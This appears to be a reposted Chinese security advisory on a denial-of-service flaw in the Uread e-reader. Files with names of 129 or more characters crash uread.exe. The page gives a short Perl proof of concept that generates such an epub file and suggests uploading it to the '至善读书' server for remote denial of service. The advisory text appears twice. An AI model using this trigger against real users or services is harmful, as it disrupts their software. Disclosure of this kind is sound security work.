您现在的位置是:网站首页> 编程资料编程资料
Uread阅读器拒绝服务漏洞的分析与解决_漏洞分析_网络安全_
2023-05-24
297人已围观
简介 Uread阅读器拒绝服务漏洞的分析与解决_漏洞分析_网络安全_
Uread阅读器在远程或本地打开文件名过长(大于或等于129个字符)的upub等文件时将引起uread.exe程序无法正常工作,必须重新启动uread.exe进程方可。
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序。
作者 demonalex
远程攻击者可考虑将过长文件名的文件上传至“至善读书”的服务器端,实现远程拒绝服务攻击。
测试证明
-----------------------------------------------------------
#!/usr/bin/perl -w
$filename="a"x129;
print "------Generate testfile \"a\"x129.epub------\n";
open(TESTFILE, ">$filename.epub");
sleep(3);
close(TESTFILE);
print "------Complete!------\n";
exit(1);
-----------------------------------------------------------
修复方案:
目前厂商还没有提供补丁或者升级程序。
作者 demonalex
相关内容
- 管家婆软件官方网存在SQL注射及弱口令的漏洞分析_漏洞分析_网络安全_
- 傲游浏览器官网存在SQL注射漏洞分析_漏洞分析_网络安全_
- 建站之星全版本后台通杀getshell的解析与解决方法_漏洞分析_网络安全_
- 新浪微博及招聘的两个XSS漏洞分析与解决方法_漏洞分析_网络安全_
- 新浪微博COOKIES盗取[flash编程安全+apache http-only cookie 泄漏利用]_漏洞分析_网络安全_
- 利用Metasploit编写Adobe Flash漏洞模块 (CVE-2012-0779)_漏洞分析_网络安全_
- 优酷资源管理系统V1.0的设计缺陷的分析与解决方案_漏洞分析_网络安全_
- 百度知道漏洞之存在反射型XSS的分析与解决方法_漏洞分析_网络安全_
- 盛大游戏外包管理平台FCK列全盘目路分析与解决方案_漏洞分析_网络安全_
- 搜狐微博的几处CSRF漏洞分析与解决方法_漏洞分析_网络安全_
